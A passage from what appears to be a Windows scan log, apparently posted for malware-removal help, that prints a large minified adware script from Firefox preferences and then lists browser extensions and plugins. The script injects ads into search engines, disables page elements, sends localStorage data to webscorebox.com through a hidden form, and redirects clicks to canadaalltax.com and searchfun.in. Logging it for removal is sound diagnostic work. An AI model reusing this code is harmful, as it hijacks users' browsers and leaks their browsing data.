e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test( B))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src= b.pixelHost+\"?hid=17411091879117559275&eid=315&pid=2405&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\", \"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function( B){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a, B){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael= B);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=17411091879117559275&eid=315&pid=2405&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e= document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project, 3E3),!1,b.inputElement,!1)}});;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"i70AALnT=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"i70AALnT=\")){var d=a.match(/i70AALnT=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9HrjkMCyVUojs9rdkMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjC9rjwEpjw5qHUFrjC8qjUGqHk=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild( B)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild( B))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch( B){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};if(-1<document.location.host.indexOf(\"loud-vibe.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3seal.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3vampire.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0];b.parentNode.style.position=\"relative\";var d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=\"0\";d.style.left=\"0\";d.style.width=\"100%\";d.style.height=\"100%\";d.style.zIndex=\"9999\";d.style.cursor=\"pointer\";b.parentNode.appendChild(d)};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=qjaKrjs4vTw4rG5GqV1FqdaFrHwFpdr4&eid=315&hid=17411091879117559275&pid=2405&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1.98\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: leethax%40leethax.net:2013.11.18b
FF - prefs.js..extensions.enabledAddons: %7Bc1970c0d-dbe6-4d91-804f-c9c0de643a57%7D:1.3.2.13
FF - prefs.js..extensions.enabledAddons: itst-firefox-plugin%40itstructures.com:1.4.4.0
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:29.0.1
FF - prefs.js..keyword.URL: "http://websearch.fas...nqvl=55&l=1&q="
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.)
